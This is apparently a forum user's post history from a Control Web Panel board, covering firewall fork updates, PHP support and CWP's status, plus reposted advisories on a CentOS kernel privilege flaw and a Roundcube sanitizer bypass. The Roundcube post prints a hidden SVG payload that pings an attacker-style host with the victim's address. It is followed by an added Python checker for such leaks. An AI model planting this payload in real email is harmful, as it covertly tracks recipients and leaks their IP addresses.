Messages - Starburst

1
CSF Firewall / Re: CSF Auto Update Re-Enabled v14.24 and v15.00
« on: March 01, 2026, 02:51:31 AM »
v15.10 just came out tonight (2026-02-28)

https://sysadmin.help/viewtopic.php?t=22

2
CSF Firewall / Re: CSF Auto Update Re-Enabled v14.24 and v15.00
« on: February 24, 2026, 09:50:52 PM »
No, the mirrors are no longer active as there are different upgrades available.

We have been working with Aetherinox fork.

You can see how to upgrade to this fork at:
https://starburst.help/control-web-panel-cwp/control-web-panel-cwp-admin-tutorials/aetherinox-csf-firewall-update-to-v15-09/

In addition to our public KB, we have also set up support forums at: https://sysadmin.help

3
Other / Re: Goodbye CWP — I’m done for good
« on: February 22, 2026, 06:36:26 PM »
I don't understand the point of these "suicide note" posts. Fine, make a choice, do it.

Because haters are gonna hate.
You look at the post history, and that's all they have posted since post 1.

Bashing CWP in one way or another, and all saying it's a 'dead project'.

4
PHP Selector / Re: Support for PHP 8.4
« on: February 18, 2026, 07:18:00 PM »
You'd be better posting it here https://www.alphagnu.com as cwp spends more time down than up.
True. The forums here were down for 3 days, again.

sysadmin.help is live now also.
And SSL works :)

5
DNS / Re: Problem connecting to CWP server on Cloudflare
« on: February 18, 2026, 07:15:52 PM »
CWP doesn't talk to Cloudflare.

So any changes on your CWP server won't affect Cloudflare, and vice versa.

6
Other / Re: Goodbye CWP — I’m done for good
« on: February 18, 2026, 07:10:18 PM »
Completely agree with Jaspreet Singh.

This project seems to be dead, as we have not received any updates since Nov 2024, and there is no support on the forum either.

Some time ago, I contacted the CWP team, and they said they were working, but they blocked me then. There are a few members who are running the forum by just saying "CWP Team is working, CWP is not dead, blah blah, etc.." and a few of them are sharing their article users, but the actual CWP team doesn't bother looking at the forum.

It's time to move on

Project is NOT DEAD. Not sure why you keep posting that line...

CWP pushed an update today (2026-02-18)  0.9.8.1222.
And before that 0.9.8.1221 was pushed on 2026-02-02

It's personal preference if you want to stop using CWP and 'move on'

I've tested other panels, and they all have CVEs and can not be kept updated as easily as CWP can be.
Some don't even have the features CWP has, and cost $$$ more.

Can CWP do better with some things, yes.

7
Other / Re: CWP Forums constantly down
« on: February 12, 2026, 11:03:27 AM »
Yes, I have already reported the problem to José, it is due to an old and no longer updated version of SMF. I suggested to José that he switch to PHPBB, which is much more robust and much better in this regard.

phpBB is good, but SMF 2.1.6 seemed better IMO, but I got outvoted for another project. :/

sysadmin.help is finally live.
Feel free to post here & there.

8
PHP Selector / Re: Support for PHP 8.4
« on: February 12, 2026, 11:00:29 AM »
The guide at:
https://www.alphagnu.com/topic/615-install-latest-version-of-php-84-php-switcher-in-cwp-control-web-panel-el89-almalinux-89/

Is for both AlmaLinux 8 and 9.
If you are running either of those you should not have to 'tweak' any paths.

Some modules were retired when PHP 8.4 was released, like IMAP in 8.4, that now need to be loaded via PECL.

9
The OWASP CRS Ruleset is the best to use, and is free, and using their other half ModSecurity, it is easy to disable any rules needed.

11
E-Mail / Roundcube Webmail Vulnerability Lets Attackers Track Email Opens
« on: February 09, 2026, 06:24:31 PM »
Source: Cyber Press https://cyberpress.org/roundcube-webmail-vulnerability-lets-attackers-track-email-opens/

In a sneaky bypass of email security features, a vulnerability in Roundcube Webmail exposes users to hidden tracking even when “Block remote images” is enabled.

Discovered during holiday tinkering, this issue (CVE-2026-25916) affects versions before 1.5.13 and 1.6.13.

Attackers can now confirm if you’ve opened their emails, logging your IP address and browser details without your knowledge.

The Problem in Plain Terms
Roundcube’s HTML sanitizer is like a bouncer at a club. It blocks external images in common spots: <img src>, <image href>, and <use href>.

These checks use a strict function called is_image_attribute() that rejects outside URLs when remote loading is off.

But the SVG element <feImage> slipped through. Its href attribute, meant to pull in remote images for filters, gets treated as a harmless link instead.

The sanitizer routes it via wash_link(), which allows HTTP/HTTPS URLs. Result? Browsers fetch the attacker’s image invisibly, bypassing the block.

Security researcher “nullcathedral” spotted this while auditing recent SVG fixes in Roundcube’s rcube_washtml.php.

One SVG bug often hints at more, and <feImage> stood out because it renders like an <img> but dodges the image checks.

How Attackers Exploit It
Imagine receiving this malicious HTML in an email:

Code:
<svg width="1" height="1" style="position:absolute;left:-9999px;">
  <defs>
    <filter id="t">
      <feImage href="https://attacker.com/track?email=victim@test.com" width="1" height="1"/>
    </filter>
  </defs>
  <rect filter="url(#t)" width="1" height="1"/>
</svg>

It’s a tiny, off-screen SVG. When rendered, the browser grabs the href image, pinging the attacker’s server.

No click required, just opening the email triggers it. Perfect for phishing campaigns or spam tracking.

CVE Details
Field | Value
CVE | CVE-2026-25916
Vendor | Roundcube
Product | Roundcube Webmail
Affected Versions | <1.5.13, <1.6.13
Disclosure Date | 2026-02-08

Developers patched it swiftly. The update tweaks is_image_attribute() with a regex: ($attr == 'href' && preg_match('/^(feimage|image|use)$/i', $tag)). Now <feImage href> gets blocked like other images.

2026-01-04: Reported to Roundcube.
2026-02-08: Versions 1.5.13 and 1.6.13 released.
2026-02-09: CVE assigned.
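
An added example, not Roundcube's code and not part of the original post: a simplified Python model of the routing described above, listing which remote image references still load with remote images blocked, before and after the fix. is_image_attribute mirrors the name in the article; remote_fetches, FETCHING, the sample message and the tracker.example host are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

REMOTE = re.compile(r'^\s*https?://', re.I)
# Attributes that make a browser fetch an image on render (those named in the article).
FETCHING = {('img', 'src'), ('image', 'href'), ('use', 'href'), ('feimage', 'href')}


def is_image_attribute(tag, attr, patched):
    """Simplified model of the sanitizer check, before and after the fix."""
    if tag == 'img' and attr == 'src':
        return True
    svg_tags = r'^(feimage|image|use)$' if patched else r'^(image|use)$'
    return attr == 'href' and re.match(svg_tags, tag, re.I) is not None


class _Scanner(HTMLParser):
    def __init__(self, patched):
        super().__init__()
        self.patched, self.leaks = patched, []

    def handle_starttag(self, tag, attrs):  # HTMLParser lowercases tag and attr names
        for attr, value in attrs:
            if (tag, attr) not in FETCHING or not REMOTE.match(value or ''):
                continue
            # Not recognised as an image attribute: treated as a link, URL is kept.
            if not is_image_attribute(tag, attr, self.patched):
                self.leaks.append((tag, value))


def remote_fetches(html, patched):
    """Return (tag, url) pairs that still load remotely with image blocking on."""
    scanner = _Scanner(patched)
    scanner.feed(html)
    scanner.close()
    return scanner.leaks


# Constructed sample message body; tracker.example is a placeholder host.
SAMPLE = '''<p>Hello</p><img src="https://tracker.example/a.png">
<a href="https://tracker.example/page">link</a>
<svg width="1" height="1"><defs><filter id="t">
<feImage href="https://tracker.example/t?id=1" width="1" height="1"/>
</filter></defs><image href="https://tracker.example/b.png"/>
<rect filter="url(#t)" width="1" height="1"/></svg>'''

if __name__ == '__main__':
    print('before fix:', remote_fetches(SAMPLE, patched=False))
    print('after fix: ', remote_fetches(SAMPLE, patched=True))
```

The same sample can be used as a regression input for any HTML mail sanitizer: a filter that blocks remote images should leave no remote URL on any of the four tag and attribute pairs.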

12
For those running CentOS Stream 9, this is a Major Vulnerability.


New CentOS 9 Vulnerability Allows Attackers to Escalate Privileges to Root
Author: Cyber Press ®
See: https://www.linkedin.com/pulse/new-centos-9-vulnerability-allows-attackers-escalate-privileges-a8xnc/


A newly identified privilege escalation flaw in CentOS Stream 9 has triggered significant security concerns within the Linux community.

The vulnerability, originating from a Use-After-Free (UAF) condition in the Linux kernel’s networking subsystem, allows a local user to escalate privileges to root.

The issue was spotlighted at the TyphoonPWN 2025 hacking competition, where it won first place in the Linux category.

Adding urgency, a Proof-of-Concept (PoC) exploit has been publicly released, enabling attackers to achieve full system compromise on vulnerable installations reliably.

Code:
static s32 cake_enqueue(struct sk_buff *skb, struct Qdisc *sch,
            struct sk_buff **to_free)
{
    // ...
    if (q->buffer_used > q->buffer_limit) {                 // [1] Check buffer limit
        u32 dropped = 0;
        while (q->buffer_used > q->buffer_limit) {
            dropped++;
            cake_drop(sch, to_free);                        // [2] Packet is DROPPED here
        }
        b->drop_overlimit += dropped;
    }
    return NET_XMIT_SUCCESS;                                // [!] Returns SUCCESS anyway
}

Root Cause in CAKE Scheduler

The flaw exists in the sch_cake (Common Applications Kept Enhanced) packet scheduler, a component responsible for managing network traffic shaping in the kernel.

The issue specifically lies in the cake_enqueue() function, which mishandles return codes during packet drops.

Under buffer pressure, CAKE discards packets using cake_drop(), yet incorrectly returns NET_XMIT_SUCCESS, indicating to upper layers that the packet was successfully queued.

13
CSF Firewall / Re: Should we update CSF to V15??
« on: February 06, 2026, 02:19:35 PM »
They are 2 separate CSF forks.

Hence all the forks have different version numbers now, not a universal one.

Some could use the last CSF v15.00 code, call it CSF2 with v1.0

If you want to switch to the Sentinel  fork, you can.
But from what I read it's aimed more at cPanel.
It also doesn't have the support like the Aetherinox fork does.

But it's all personal preference at this time.

14
CentOS 9 Problems / Re: ClamAV issue in user panel
« on: February 05, 2026, 12:23:49 PM »
With AlmaLinux 9, things have to be installed in a certain way.
Including ClamAV.

If not, they will not work.

There is an old install guide running around the forums on the proper way to install AlmaLinux 9 and CWP.

15
Mod_Security / Re: atomic crop. free waf rules set
« on: January 31, 2026, 06:49:36 PM »
By all means have fun using AI...

When your server is hacked, maybe you can ask it for help also...

But don't blame CWP or anything else when it happens...
